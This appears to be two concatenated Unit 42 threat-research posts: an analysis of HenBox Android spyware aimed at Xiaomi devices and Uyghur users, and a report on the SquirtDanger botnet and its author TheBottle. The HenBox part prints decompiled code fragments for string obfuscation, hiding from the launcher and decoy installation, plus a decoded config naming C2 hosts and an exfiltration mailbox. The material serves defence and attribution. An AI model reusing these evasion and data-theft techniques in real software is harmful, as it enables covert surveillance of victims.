HenBox has ties to infrastructure used in targeted attacks, with a focus on politics in South East Asia. These attackers have used additional malware families in previous activity dating to at least 2015 that include PlugX, Zupdax, 9002, and Poison Ivy.

HexBox apps target devices made by Chinese consumer electronics manufacture, Xiaomi and those running MIUI, Xiaomi’s operating system based on Google Android. Furthermore, the malicious apps register their intent to process certain events broadcast on compromised devices in order to execute malicious code. This is common practice for many Android apps, however, HenBox sets itself up to trigger based on alerts from Xiaomi smart-home IoT devices, and once activated, proceeds in stealing information from a myriad of sources, including many mainstream chat, communication and social media apps. The stolen information includes personal and device information.

The main purpose of this follow-up blog is to provide additional information, and detailed analysis, about HenBox apps.

Delivery and Installation

During our investigation, we discovered one HenBox app previously hosted on the third-party Android app store, “uyghurapps[.]net”. This HenBox variant masqueraded as the legitimate VPN application, “DroidVPN”, and carried the app as an asset, embedded within itself. Once HenBox installs on a compromised device, it begins the installation process for the legitimate DroidVPN.

At the time of writing, we are unaware of any HenBox apps hosted on other third-party app stores; given the high volume of HenBox apps analyzed in our Wildfire sandbox, we can only speculate as to how other apps are delivered to victims; much of the Android malware seen in the wild tends to be delivered via third-party app stores, forums and file-sharing platforms, and of course by via ubiquitous phishing emails.

HenBox Decoys

Further analysis of the HenBox malware family is below, however, on the subject of masquerading apps, and installing embedded apps, it’s worth explaining how this decoy technique works.

The HenBox variant being described here relates to that listed in Table 1, below, which masquerades as DroidVPN; other apps were used with decoys, and are described in more detail in the previous blog.

APK SHA256 Size (bytes) First Seen App Package name

 

App name
0589bed1e3b3d6234c30061be3be1cc6685d786ab3a892a8d4dae8e2d7ed92f7 2,740,860 May 2016 com.android.henbox DroidVPN

Table 1 HenBox variant using decoy techniques

Once HenBox is installed, and launched by the victim, the app starts the installation process of the legitimate, embedded app by executing the following code.

Intent localIntent = new Intent("android.intent.action.VIEW");

localIntent.setDataAndType(Uri.fromFile(new File(str)), DaemonServer.a(new char[] { 56, 41, 41, 53, 48, 58, 56, 45, 48, 54, 55, 118, 47, 55, 61, 119, 56, 55, 61, 43, 54, 48, 61, 119, 41, 56, 58, 50, 56, 62, 60, 116, 56, 43, 58, 49, 48, 47, 60 }));

startActivity(localIntent);

Having created a new intent – android.intent.action.VIEW – at run-time, as opposed to declared statically in the app’s AndroidManifest.xml, the remaining code configures parameters relating to the embedded decoy app. The first argument to setDataAndType() contains said decoy app’s filename – res.apk – referenced as “str”.

Method a() of the DaemonServer class contains an XOR routine to decode the byte string argument using, in this case, a single-byte key 0x59. The following code snippet shows the decoded output used as the second argument to setDataAndType();

application/vnd.android.package-archive

The decoded string shown above represents the Multipurpose Internet Mail Extensions (MIME) type associated with APK (Android app package) files.

Calling startActivity() with this intent configuration triggers Android to provide a handler – most likely the app package manager – that would prompt the victim to install the embedded application. Given, in this case, the victim most likely intended to install a VPN app, this secondary install for that app should come as no surprise, however, it’s likely the HenBox installation process would have also occurred and may have been more suspicious. Potential victims are likely lured into installing the apps through the use of app names, iconography, or other similar traits to those apps being sought; some HenBox apps purport to be system or back-up apps that may appear plausible to the victim.

Inside the Coop -HenBox Analysis

The following description is based on the HenBox app listed in Table 3 below. The reason for choosing this app for more detailed analysis, was the significant ties to infrastructure seen also having hosted Windows malware, such as PlugX.

SHA256 Package Name App Name First seen
a6c7351b09a733a1b3ff8a0901c5bde

fdc3b566bfcedcdf5a338c3a97c9f249b

com.android.henbox 备份 (Backup) Aug 29th 2017

Table 2 HenBox variant used in description

The majority of HenBox apps, including this one, used the following developer signature information to sign the APK file.

CN=henbox, OU=henbox, O=henbox, L=Guangzhou, ST=Guangdong, C=CN

A smaller subset of HenBox apps used the “Android Debug” signature used typically when developers are testing their development. This shortcut is used to sign malicious apps, rather than the adversary creating their own signature, however there can be limitations as to where the app can be hosted and installed when using it. Recent HenBox apps have the common name (CN) changed to “h123enbox” or the entire signature as, simply, “C=cn”, where ‘C’ is the certificate attribute for Country.

The following figures illustrate the structure of a typical HenBox app, how they are delivered, and the app behavior once installed.

Henbox_1

Figure 1 HenBox app delivery and structure

In Figure 1 we included three methods for delivering HenBox commonly used by threat actors to deliver Android malware: websites, such as forums, phishing emails, and third-party app stores. It is likely HenBox is also delivered via the same methods. However, as previously mentioned, we do not have current visibility into delivery methods other than third-party app stores, for which we saw one instance.

To our knowledge, user interaction is required to install HenBox apps. Given the third-party app store we observed serving HenBox, and the decoy apps used, it’s clear the adversary relies heavily on social engineering techniques to compromise their victims.

Most HenBox apps seen to date contain a similar structure of files and components within the APK package. Optionally, as shown with the dotted line in Figure 2, and as described with the DroidVPN example earlier, HenBox apps may include an embedded APK file for use as a decoy. Another example of this is a HenBox sample that purports to be the popular online video platform iQiyi. That platform has over 500 million unique users, almost half of which are mobile viewers, providing yet another popular decoy app with which to social engineer potential victims.

Figure 1 above describes the structure of the HenBox app listed in Table 2 above. The numbered components from Figure 1 are listed in more detail in Table 3 below and described afterwards. Some of the components are RC4 encrypted using the downloaded-string key “a85fe5a8”; other components are XOR-encoded using various key values. Native libraries, in the form of Executable and Linkable Format (ELF) files, are common to HenBox samples and the Java Native Interface (JNI) allows the Android app components to communicate with and execute functions in these libraries.

# Filename Obfuscation

Compression

Type Purpose
1 ./assets/b.dat RC4(Zlib) ELF Interacts with other components inside the a.zip archive.
2 ./lib//liblocsdk.so N/A ELF Baidu library for device geo-location data.
3 ./lib//libloc4d.so N/A ELF Handlies RC4 decryption, Zlib decompression and HTTP network communication.
4 ./assets/sux (and suy) XOR (0x51) ELF Contains embedded SU (Super User) and other root-related capabilities to run privileged commands; Harvests messages and other private data from popular messaging and social media apps.
5 ./classes.dex N/A DEX Main Dalvik file containing Java for HenBox
6 ./assets/setting.txt XOR (0x88) Data Config file containing C2 and other information
7 ./assets/daemon N/A ELF Starts services, monitors environment settings and system logs.
8 ./assets/a.zip RC4(ZIP) Archive Zip archive containing two files
9 ./assets/a.zip/libkernel.so N/A ELF Library handling various activities including loading a secondary Dalvik DEX file (lib.dat)
10 ./assets/a.zip/lib.dat RC4(Zlib) DEX Dalvik file for parsing config file, monitoring out-going calls, intercepting SMS messages and more.

Table 3 Contents and components of this HenBox variant

Chickens in flight

There are two methods to execute HenBox’s malicious code. The first method, as depicted by Figure 2 below, is automatic based on the operating system generating one of a handful of broadcasts that HenBox registered its intent to process during the app installation process. Examples include events like device reboots or when an app is newly installed. The list of all the intents registered statically via HenBox’s AndroidManifest.xml file are described in the appendix below; HenBox also registers further intents at run-time.

Henbox_2

Figure 2 HenBox execution via Intents and External Triggers

Most of the intents listed in the appendix, and in Figure 2, are commonly found in malicious Android apps, and are the equivalent of setting registry run keys on Windows to autostart applications under certain conditions. One intent stands out and is much less common to see – com.xiaomi.smarthome.receive_alarm.

Xiaomi, a privately owned Chinese electronics and software company, is the 5th largest smart phone manufacturer in the world, manufacturing IoT devices for the home. Devices range from smart lights to smart rice cookers, and much more in-between. Devices are controlled using Xiaomi’s “MiHome” app, which has been downloaded between 1,000,000 and 5,000,000 times.

Given the nature of connected devices in smart homes, it’s highly likely many of these devices, and indeed the controller app itself, communicate with one another sending status notifications, alerts and so on. Such notifications, received by the MiHome app can also be processed by other apps, provided they register their intent to do so, such as HenBox. Essentially, this allows for external IoT devices to act as a trigger to execute the malicious HenBox app’s code.

Triggered intents result in execution of code that’s present in either the BootReceiver or TimeReceiver classes, both of which ultimately lead to a new instance of the DaemonServer service being created and started. This service is discussed in more detail later. In addition, BootReceiver changes the device ringer mode to a value of 2, which results in ringtones being audible, and setting vibrate mode on. This may have been done in an attempt to have nearby people interact with the (now noisy) device such that information stolen may be richer in content. For more information on these intents and their purpose, please see the appendix.

The alternative method for executing the HenBox code is for the user to launch the malicious app from the launcher view on their device, as shown in Figure 3.

Henbox_3

Figure 3 HenBox app present in Launcher View on Android

Upon manual launch, HenBox code executes and performs the steps highlighted in Figure 4 below.

Henbox_4

Figure 4 HenBox execution via human interaction

Firstly, checks are made to determine whether the device manufacturer is Xiaomi, or the firmware is MIUI (Xiaomi’s fork of Android). The intention here seems to be one of targeting Xiaomi and exiting prematurely if the checks fail, however poorly written code results in execution in more environments than the adversary perhaps wanted. Further checks try to ascertain whether HenBox is running on an emulator, perhaps being cautious around potential researcher environments. Interestingly, the code for these additional checks are concealed inside a class called AlarmService, which is appears to be code from online tutorials for Android developers, perhaps to hide the adversary’s code from plain sight. Assuming these checks pass, HenBox continues to execute by next loading the ELF library libloc4d.so; its functionality is discussed later in this blog.

Using Android’s shared preferences feature to persist XML key-value pair data, HenBox checks whether this execution is its first. If it is, and if the app’s path does not contain “/system/app” (i.e. HenBox is not running as a system app, which provides elevated privileges), one of two embedded “su?” ELF libraries are XOR-decoded. A JNI call is then issued to libloc4d.so passing three strings – the app’s package name, the package name including the current class, which is “MainActivity”, and the path to the HenBox app. This JNI call leads to the execution of the “su?” (henceforth sux) binary, which is also discussed in more detail later.

The two files – “suy” and “sux” – are essentially the same; “sux” is used if the Android version on the victim’s device is 4.1 (aka “Jelly Bean”) or newer; “suy” will be used for older versions.

Finally, an instance of the DaemonServer service starts and, if a decoy app is embedded inside HenBox, as per the DroidVPN example, the installation process for it also starts.

DaemonServer Class

Figure 5 below illustrates the typical behavior of the DaemonServer service, starting with hiding the HenBox app from the launcher view and the app drawer/tray. This behavior is common amongst Android malware and, while the app remains installed with its services running, it is harder to discover by the victim. The non-obfuscated ELF file “daemon” is loaded next; the program gathers environmental information about the device by accessing system and radio log files, and by querying running processes.

Henbox_5

Figure 5 HenBox’s DaemonServer Service code execution flow

A Baidu library is used to for gathering device geo-location information; another run-time intent is registered to intercept outgoing phone calls, allowing HenBox to check the number dialed for prefixes matching “+86” – the country code for the People’s Republic of China. Interestingly, instead of using Baidu’s coordinate system, HenBox specifies the GCJ-02 alternative provided by the Chinese State Bureau of Surveying and Mapping. According to public sources, this system adds apparently random offsets to both the latitude and longitude, with the alleged goal of improving national security.

Further assets are then deployed and decoded, if necessary, including a.zip and setting.txt. Code is present in this variant to also deploy assets named “plugin” and “AppVoice”, however, they are not present in this sample, a likely indication of evolving development and use of multiple components, depending the adversary’s needs at a given time.

HenBox’s config file, setting.txt, is decoded using XOR with a single-byte key, 0x88; filenames and XOR keys differ occasionally between variants. Once de-obfuscated, the config file’s contents resembles something like the following text:

a1=wd.w3.ezua[.]com
a2=80
a3=crash_report@21cn[.]com
a4=smtp.21cn[.]com
a5=crash_report
a6=lxy.cn@163[.]com
a7=
a8=0914D1D428914B09A5372866B39524B9
a9=
b1=0
b2=0
b3=1
b4=http://www3.mefound[.]com/aa.txt

Interestingly, open source research indicates the email address in the above HenBox config file belongs to a scholar of Cyber Security at the University of the Chinese Academy of Sciences in Beijing, China. They are listed as an author on the paper “Recognition of Information Leakage of Computer via Conducted Emanations on the Power Line.” Why the email appears in the configuration file of HenBox malware is not known at the time of writing.

Currently, it’s not known to us exactly how all these parameters are used, however some of the domains (or IP addresses in other variants) are used as the C2 for the threat actors.

Finally, a worker thread is then created that sets various components running in the background. One of the key components used is the ELF file named “b.dat”, which in turn interacts with “a.zip”. The archive file a.zip contains two further files: libkernel.so (another ELF file) and lib.dat, which is actually a Dalvik DEX file containing further Java code for the app’s behavior, beyond the default classes.dex file. Some of the key data-harvesting behavior of HenBox stem for these files – b.dat and the contents of a.zip – all four of which are RC4-encrypted, forming the most heavily obfuscated components within HenBox.

Once unpacked and available for use, the new DEX file is executed from within the DaemonServer class of the main HenBox app. A DexClassLoader object is created and a loadClass method is called for a class “com/common/ICommonFun” contained within the once deeply-nested, and obfuscated secondary DEX file. From the newly-loaded class, a method is called to invoke further HenBox capabilities, including enumerating all running applications and killing those that have the permission to receive SMS messages, before registering its own run-time Intent to do so, and thus intercept the victim’s messages.

The method continues next by loading the libkernel.so library file, also unpacked from the a.zip archive. This ELF file has numerous capabilities, many of which stem from using a built-in version of BusyBox – a package containing various stripped-down Unix tools useful for administering such systems. This executable interacts with the aforementioned sux executable and, amongst other things, temporarily disables the noise made by the device when photos are taken. This is achieved by moving the audio file “/system/media/audio/ui/camera_click.ogg” elsewhere, and back again once the picture-taking is complete.

Dynamic C2s

At the time of writing, three HenBox variants, all seen in early April 2017, gathered their C2 addresses dynamically. The three are listed in Table 3, below.

SHA-256 Package Name App Name First Seen
184e5cbebef4ee591351cfaa1130d5741

9f70eb95c6387cb8ec837bd2beb14d6

com.android.henbox 备份 (Backup) April 2nd 2017
efa3cd45e576ef8ab22d40fc9814456d0

6a6eeeaeada829c16122a39cb101dbf

com.android.henbox 备份 (Backup) April 2nd 2017
9d85be32b54398a14abe988d98386a3

8ce2d35fff91caf1be367f7e4b510b054

com.android.henbox 备份 (Backup) April 1st 2017

Table 4 HenBox variants using dynamic C2s

As previously mentioned, HenBox config files contain the C2 information for the malware. In the case of the three variants listed in Table 3, the C2 address was http://blog.sina.com[.]cn/s/blog_772696fb0102wemg.html. The content of the site, at the time of writing, is shown in Figure 6 below.

Henbox_6

Figure 6 Example website hosting the HenBox C2 information

The blog contains structured text strings beginning with “ConnectURL” that, when parsed, provide the IP address and port number for HenBox to use as its C2.

Conclusion

Typically masquerading as legitimate Android system apps, and sometimes embedding legitimate apps within them, the primary goal of the malicious HenBox apps appears to be to spy on those who install them. Using similar traits, such as copycat iconography and app or package names, victims are likely socially engineered into installing the malicious apps, especially when available on so-called third-party (i.e. non-Google Play) app stores which often have fewer security and vetting procedures for the apps they host. It’s possible, as with other Android malware, that some apps may also be available on forums, file-sharing sites or even sent to victims as email attachments, and we were only able to determine the delivery mechanism for a handful of the apps we have been able to find.

The hosting locations seen for some HenBox variants, together with the nature of some embedded apps including: those targeted at extremist groups, those who use VPN or other privacy-enabling apps and those who speak the Uyghur language, highlights the victim profile the threat actors were seeking to attack. The targets and capabilities of HenBox, in addition to the ties to previous activity using four different Windows malware families with political-themed lures against several different South East Asian countries, indicates this activity likely represents an at least three year old espionage campaign.

Palo Alto Networks customers are protected by:

Autofocus customers can investigate this activity using the following tag. To date we believe HenBox is not a shared tool, however, the remainder of malware used by these attackers is shared amongst multiple groups:

Android Hygiene

Update: Keep installed apps updated. Much like patching Operating System and application files on PCs, Android and apps developed for the platform also receive security updates from Google and app developers to remove vulnerabilities and improve features, including security.

Review: App permissions to see what the app is potentially capable of. This can be quite technical but many permissions are named intuitively describing if they intend to access contacts, messages or sensors, such as the device microphone or camera. If you the permission seem over the top compared to the described functionality, then don’t install. Also read the app and developer reviews to evaluate their trustworthiness.

Avoid: 3rd party app stores that may host pirated versions of paid apps from the Google Play app store, often such apps include unwanted extra features that can access your sensitive data or perform malicious behaviors. Also avoid rooting devices, if possible, as apps could misuse this power.

Appendix

The following analysis is based on the HenBox Android APK file listed in Table 5 below.

SHA256 Package Name App Name First seen
a6c7351b09a733a1b3ff8a0901c5bde

fdc3b566bfcedcdf5a338c3a97c9f249b

com.android.henbox 备份 (Backup) Aug 29th 2017

Table 5 HenBox app detailed in the analysis

The permissions declared statically in the AndroidManifest.XML file are pretty aggressive, and in line with what you would expect from this type of espionage Android malware. Table 6 below lists and describes the Android permissions declared for this variant of HenBox.

Category Permission Description
System KILL_BACKGROUND_PROCESSES The ability to kill processes associated to given packages may allow the app to stop security apps, or those that may be running, which it is attempting to imitate or install.
System WAKE_LOCK Allows for the CPU to be kept awake, and screen on, for background tasks to continue.
System WRITE_SETTINGS** Ability to modify system settings
System RECEIVE_BOOT_COMPLETED Can receive the broadcast message when system finishes booting.
System READ_LOGS Allows for reading the low-level system log files.
System GET_TASKS Retrieve the list of running tasks from all apps.
Storage MOUNT_UNMOUNT_FILESYSTEMS (un)mount file systems for removable storage access.
Storage WRITE_EXTERNAL_STORAGE Write to external storage.
Sensors CAMERA Access the device camera(s)
Sensors RECORD_AUDIO Record audio through device microphone
Network INTERNET Ability to open network sockets
Network ACCESS_NETWORK_STATE Access information about phone networks
Network ACCESS_WIFI_STATE Access information about WiFi networks
Network CHANGE_WIFI_STATE Change Wi-Fi connectivity state
Network CHANGE_NETWORK_STATE** Change network connectivity state
Messages READ_SMS Read SMS messages
Messages RECEIVE_SMS Receive SMS messages
Messages SEND_SMS Send SMS messages
Messages WRITE_SMS** Write SMS messages
Location ACCESS_COARSE_LOCATION Access approximate location
Location ACCESS_FINE_LOCATION Access precise location
Contacts READ_CONTACTS Read user’s contacts data
Contacts WRITE_CONTACTS  Write to the user’s contacts data
Calls READ_PHONE_STATE Read-only access to device phone number, current cellular network information and the status of any ongoing calls.
Calls READ_CALL_LOG Read the call log of previous outgoing, incoming and missed calls.
Calls READ_PHONE_STATE (duplicate) (see above)
Calls PROCESS_OUTGOING_CALLS Ability to see the number being dialed during an outgoing call with the option to redirect the call to a different number or abort the call altogether
Calls CALL_PHONE Initiate a phone call without going through the Dialer user interface for the user to confirm the call
Calls WRITE_CALL_LOG Write to the user’s call log data
Calendar READ_CALENDAR Read the user’s calendar data
Browser browser.permission.

READ_HISTORY_BOOKMARKS**

Access browsing history from web browser(s)

Table 6 Typical permissions requested by HenBox

**Some permissions are deprecated in recent Android versions, or now require more stringent permission requests including user-interaction for secondary permission acceptance; in some cases, 3rd party apps may no longer be allowed to use some of the listed permissions. The ability to write SMS messages, for example, was overhauled in version 4.4 (aka KitKat) some 4 years ago.

Some variants have slightly differing permissions; noteworthy that some recent variants of HenBox have included Bluetooth related permissions, as detailed in Table 7 below.

Category Permission Description
Network BLUETOOTH Allows applications to connect to paired bluetooth devices
Network BLUETOOTH_ADMIN Allows applications to discover and pair bluetooth devices.

Table 7 Additional permissions in more recent HenBox variants

Once the user installs the app, two services are registered, as shown in Figure 7 below – showing an extract from this app’s AndroidManifest.xml file.

Henbox_7

Figure 7 AndroidManifest.xml service declarations

Both services have been discussed already but to recap, DaemonServer is responsible for hiding the malicious app, enabling location tracking and gathering phone numbers called from the device, with specific interest of Chinese numbers; further components are also unpacked and launched when this class is instantiated and run.

AlarmService contains an approximate copy of Google’s Android API demo code for creating alarm and timer apps. Extra classes and methods have been added providing functionality to HenBox, including anti-debug and anti-analysis code capable of detecting if the app is running within emulator, and possibly research analysis, environments.

Manifest-declared priority values of 1000 are set for both services, as shown in Figure 7, albeit erroneously. Setting high, or in this case maximum, values in the priority attribute is a trick typically used when declaring intents and receivers for system broadcasts to ensure certain apps (often malicious) are executed ahead of intended apps that would handle such events. There is no such priority concept for services; the operating system alone controls service CPU time, according to how busy the device is and how much resource remains.

The attribute “exported”, shown in Figure 7, relates to whether or not components of other applications can invoke the service, or interact with it — “true” if they can; “false” if not. This immediately makes DaemonServer a little more interesting.

Android receivers com.android.henbox.BootReceiver and com.android.henbox.TimeReceiver are also declared in the AndroidManifest.xml to receive broadcast messages under certain conditions. BootReceiver, as per the services listed in Figure 7 above, has its priority attribute (correctly) set to 1000, allowing certain intent-filters to trigger and run the malicious receiver above the receivers and matching intents from other apps.

The intent filters listed in the AndroidManifest.xml are briefly described in the Table 8 below, together with the receivers they refer to.

Receiver Intent Name Description
BootReceiver android.intent.action.BOOT_COMPLETED System notification that the device has finished booting.
android.intent.action.restart A legacy intent used to indicate a system restart.
android.intent.action.SIM_STATE_CHANGED System notification that the SIM card has changed or been removed.
android.intent.action.PACKAGE_INSTALL System notification that the download and eventual installation of an app package is happening (this is deprecated)
android.intent.action.PACKAGE_ADDED System notification that a new app package has been installed on the device, including the name of said package.
com.xiaomi.smarthome.receive_alarm Received notifications from Xiaomi’s smart home IoT devices.
TimeReceiver android.intent.action.ACTION_TIME_CHANGED System notification that the time was set.
android.intent.action.CONNECTIVITY_CHANGE System notification that a change in network connectivity has occurred, either lost or established. Since Android version 7 (Nougat) this information is gathered using other means, perhaps inferring the devices used by potential victim run older versions of Android.

Table 8 HenBox intents declared statically in AndroidManifest.xml

Most of the intents listed are commonly seen in malicious, information-stealing Android apps that wish to hook certain common events, such as system reboots, network changes, new apps installed and so forth, acting as a trigger to their code.

As mentioned earlier, HenBox registers a much less common and more interesting intent filter – com.xiaomi.smarthome.receive_alarm. This relates to Xiaomi’s smart home IoT devices, and their MiHome controller app for smartphones. Broadcasts or notifications from such Xiaomi’s devices, which would usually be processed by the MiHome app, could now also be processed by HenBox, acting as a trigger to launch its malicious behavior.

Whichever Intent triggers HenBox will execute code declared in BootReceiver or TimeReceiver; both receivers’ code resembles the snippet below, which starts a new instance of the service DaemonServer and increment an integer by 1.

DaemonServer.d += 1;
paramContext.startService(new Intent(paramContext, DaemonServer.class));

BootReceiver also executes the following line of code, resulting in the device’s ringer mode being set to audible and vibrate mode on.

((AudioManager)paramContext.getSystemService("audio")).setRingerMode(2);

The purpose for this additional behavior in BootReceiver is unknown but given the requested permissions, the capability to gather information from device sensors, such as the microphone and cameras, it’s feasible the intention of changing the ringer settings is to encourage interaction with the device by anyone nearby, perhaps leading to richer content of the data being exfiltrated.

Aside from using Intents and Receivers to launch HenBox, as mentioned above, there is an alternative – launching the app manually from the launcher view on Android, as shown in Figure 8 below. Doing so results in code in the MainActivity class being executed, which is equivalent to a Windows Portable Executable (PE) file’s entry point.

Henbox_8

Figure 8 Android app launcher view and the HenBox app

Specifically, the onCreate() method in the MainActivity class is executed. This code performs some initial checks of the device manufacturer and Operating System before continuing. The actors seemed to be interested only in Xiaomi devices, or Xiaomi’s fork of Android called MIUI (“Me You I”) running on any device. The code performing these checks is buggy and results in execution in more environments then perhaps anticipated.

Continuing with the device checks, HenBox performs various well-documented anti-emulator checks, such as querying the device phone number, device IDs, IMSI, various QEMU-related environment settings, hardware configurations and other notable strings to compare against known constants that would infer an emulator device, which are commonly used for app analysis. Finally, they check for tainted Operating Systems, such as the presence of TaintDroid code used for tracking app behavior.

Android’s shared preferences feature is used to persist information beyond the lifetime of the app execution, and to retrieve said information, should it exist. HenBox uses this feature to symbolize if the malware has already run. The strings used to denote this are XOR-encoded with single-byte key, 0x59; a helper method in the DaemonServer class is used for decoding. The strings are listed in Table 9 below.

# Encoded Decoded
1 41 43 60 63 60 43 60 55 58 60 Preference
2 31 48 43 42 45 11 44 55 FirstRun
3 0 28 10 YES
4 118 42 32 42 45 60 52 118 56 41 41 /system/app

Table 9 Example HenBox XOR encoded strings

HenBox attempts to hide itself from the app launcher view by running the following code, passing the parameters COMPONENT_ENABLED_STATE_DISABLED (2) and DONT_KILL_APP (1) to the setComponentEnabledSetting() method.

getPackageManager().setComponentEnabledSetting(new ComponentName(this, MainActivity.class.getName()), 2, 1);

DaemonServer Service

To recap, the DaemonServer Service is launched either through the two receivers’ intent filters being triggered by certain events occurring on the device, or through launching the app manually. Either way, the registered service’s entry-point method, onCreate(), is executed.

Location tracking for the device is enabled using the com.baidu.location.service_v2.9 libraries carried within the HenBox APK file. However, instead of using Baidu’s coordinate system, HenBox specifies the GCJ-02 alternative provided by the Chinese State Bureau of Surveying and Mapping. According to public sources, this system adds apparently random offsets to both the latitude and longitude, with the alleged goal of improving national security.

DaemonServer continues by setting up a PhoneStateListener object instance, customized to handle cases of phone numbers starting with “+86” (country dialing code for China), and listens for changes to the device call state. A run-time, high-priority intent filter is setup for android.intent.action.NEW_OUTGOING_CALL, so as to inform HenBox when a phone call is made. The associated receiver – BroadcastReceiver – retrieves the phone number being dialed using the getStringExtra(“android.intent.extra.PHONE_NUMBER”) method call.

IOCs

For a full list of SHA256 hashes, their first encountered timestamp, and details of Android package and app names relating to over 200 apps, please refer to the following file on GitHub.

The post HenBox: Inside the Coop appeared first on Palo Alto Networks Blog.

Go to Source
Author: Alex Hinchliffe

SquirtDanger: The Swiss Army Knife Malware from Veteran Malware Author TheBottle

Finding and investigating new malware families or campaigns is a lot like pulling a loose thread from an article of clothing. Once you start tugging gently on the thread, everything starts to unravel. In this particular case we began by investigating a new malware family, which we are calling SquirtDanger based on a DLL, SquirtDanger.dll, used in the attacks. There is strong evidence to indicate that this malware family was created by a prolific Russian malware author that goes by the handle of ‘TheBottle’. By pulling on a few strings we were eventually led to TheBottle’s unraveling. In this post we will delve into how we unraveled TheBottle’s activities and his newest malware family.

Malware Overview

SquirtDanger is a commodity botnet malware family that comes equipped with a number of characteristics and capabilities. The malware is written in C# (C Sharp) and has multiple layers of embedded code. Once run on the system, it will persist via a scheduled task that is set to run every minute. SquirtDanger uses raw TCP connections to a remote command and control (C2) server for network communications.

SquirtDanger comes with a wealth of functionality, including the following:

  • Take screenshots
  • Delete malware
  • Send file
  • Clear browser cookies
  • List processes
  • Kill process
  • List drives
  • Get directory information
  • Download file
  • Upload file
  • Delete file
  • Steal wallets
  • Steal browser passwords
  • Swap identified wallets in the victim’s clipboard
  • Execute file

The ability to swap out identified wallets with a predetermined wallet owned by the attacker is not a new one, as we have previously reported on it when analyzing the ComboJack malware family. For more information on how the SquirtDanger malware family operates, please refer to an in-depth analysis within the Appendix of this post.

Using various analytic techniques, Palo Alto Networks Unit 42 researchers were able to extract an embedded identifier from roughly 400 SquirtDanger samples, which we attribute to separate campaigns. Broadly, we identify two subsets of this malware which are divided by distinct mutexes and other indicators that we observed in WildFire. As we dug into this malware, we discovered a code repository which coincided with the capabilities and style of the samples we had observed. A screenshot of this repository’s base page is reproduced in figure 1 below:

SquirtDanger_2

Figure 1 Source code of SquirtDanger hosted on GitHub

Further analysis of the code in this repository indicated that our initial assessment was correct, and that this repository was the source code for SquirtDanger. While exploring the code, we discovered that TheBottle had posted this repository (and others) as a companion to a “confession” blog posted on telegra.ph.

TheBottle Connection

TheBottle, a well-known Russian cybercriminal has been active on global underground marketplaces for years. Distributing, selling, and trading malware and source code has been TheBottle’s modus operandi on underground marketplaces and forums. It appears, however, that TheBottle has encountered several issues throughout his career as a malware author. According to Vitali Kremz of Flashpoint:

Previously, TheBottle was banned unanimously by the underground arbitrators for customer infractions. His underground infractions were very costly leading to multiple disputes accusing him of not delivering malware support that was needed for long-term criminal operations.

While investigating SquirtDanger, we came across a confessional blog post claiming to be TheBottle. In the post, the individual claimed responsibility for creating several malware families, including Odysseus Project, Evrial, Ovidiy Stealer, and several others. Again, Vitali of Flashpoint:

“In his latest confession on telegraph, the actor walks through their life in underground lamenting on his challenges of being a malware developer with real-life issues… His sense of guilt pushed him to release all of his malware creations that were used in many cybercrime operations in the past from “Ovidiy Stealer” to “Reborn Stealer.”

Below is a screenshot of TheBottle’s original post in his native Russian:

SquirtDanger_3

Figure 2 Screenshot of TheBottle’s blog post, confessing to authorship of malware families. TheBottle is ultimately expressing regret for creating many of the malware families.

Looking closer at TheBottle’s blog posting revealed a Telegram channel exposing a group of roughly 900 individuals most of whom appear to be Russian. Here the channel members are coordinating attacks, developing code, and trading/selling access to several different botnets and builders. Additionally, this Telegram group appears to be a common haunt of some interesting prolific actors,  some with high-profile ties; such as foxovsky, an underground actor who is famous in underground communities for developing malware. Readers may recall foxovsky as being the author of a previously reported malware family called Rarog. Additionally, the ‘1MSORRY‘ actor was identified as being a member of this community, who is behind the 1MSORRY cryptocurrency botnet and other malware families being distributed around the globe.

SquirtDanger_4

Figure 3 Screenshot of Telegram channel with prolific underground actors communicating

After some online sleuthing, we were able to find additional accounts across several social media sites TheBottle frequented. Across most of the social media sites we located, it was apparent TheBottle took his hacking persona seriously.

SquirtDanger_5

Figure 4 Screenshot of TheBottle’s Twitter feed

Also, looking closer into TheBottle’s Twitter conversations helped shed some light on how TheBottle feels about individuals using their malware.

SquirtDanger_6

Figure 5 Screenshot of TheBottle’s conversation with @malwarhunterteam

Infection Vector/Victimology

In total, we saw 1,277 unique SquirtDanger samples used across multiple campaigns. SquirtDanger is likely delivered via illicit software downloads also known as “Warez”.

As of the time of writing, we witnessed 119 unique C2 servers that were geographically dispersed:

SquirtDanger_7

Figure 9 Geographic distribution of identified C2 servers

Additionally, in the wild, we were able to identify 52 unique IP’s or domains acting as delivery infrastructure. This infrastructure acts as a dissemination point for this malware. Some of this delivery infrastructure appeared to be compromised legitimate websites unwittingly distributing SquirtDanger.

We have witnessed SquirtDanger being used against individuals across the globe, such as a Turkish university, an African telecommunications company, and a Singaporean Internet service provider.

Conclusion

The SquirtDanger malware family is just one of many commodity families being created today. It comes equipped with a wealth of features that allow attackers to quickly perform various actions on a compromised machine. While the malware itself proved to be interesting, it was the actor behind it that provided a much more interesting story.

As we pulled on TheBottle’s thread, we slowly started to realize that what we’ve found is just the tip of the proverbial iceberg. As we looked deeper into TheBottle’s malware and online activity, we noticed this was just minor activity taking place in a larger web of criminals working together. In fact, just recently, one of TheBottle’s allies was outed by the researcher known as Benkow.

Ultimately, as we unraveled a small portion of criminal activity, we were able to observe a malware author evolve into what seemed a somewhat remorseful individual, posting on a near personal level. Ultimately, will TheBottle change his ways? We will watch and see.

Using several sources of intelligence were key to the investigation of this actor and malware, and Palo Alto Networks customers are protected from this threat by:

  1. WildFire detects all SquirtDanger files with malicious verdicts
  2. AutoFocus customers can track these samples with the SquirtDanger tag
  3. Traps blocks all of the files associated with SquirtDanger

Appendix

Malware Analysis

The SquirtDanger malware family comes equipped with a wealth of features by the author. The malware is coded using C#. The malware author chose to make use of the Costura add-in to embed the SquirtDanger payload into the compiled executable.

Once the main module is loaded and subsequently executed, it will begin by creating an installation directory, where the malware will copy itself. The following directories and their corresponding installation executables have been observed in the samples analyzed:

  • %TEMP%Microsoft_SQL_SDKsAzureService.exe
  • %TEMP%MonoCecilFazathron.exe

After SquirtDanger is copied to the necessary path, a new instance of this malware will be spawned prior to killing the current process.

Once the installation phase has completed and the malware is found to be executed from the correct location, a new mutex will be created to ensure only one instance of the malware is run at a given time. The following two mutexes have been observed across all analyzed samples:

  • Omagarable
  • AweasomeDendiBotnet

After the mutex has spawned, SquirtDanger will proceed to check for the existence of another executable, which will act as a persistence mechanism. This simple executable will simply check for the existence of the SquirtDanger payload, and if the payload cannot be found, a new copy is written to disk and a new instance will be spawned. This executable is embedded within the SquirtDanger payload, and has been observed dropped to the following location:

  • %TEMP%MSBuild.exe
  • %TEMP%OmagarableQuest.exe

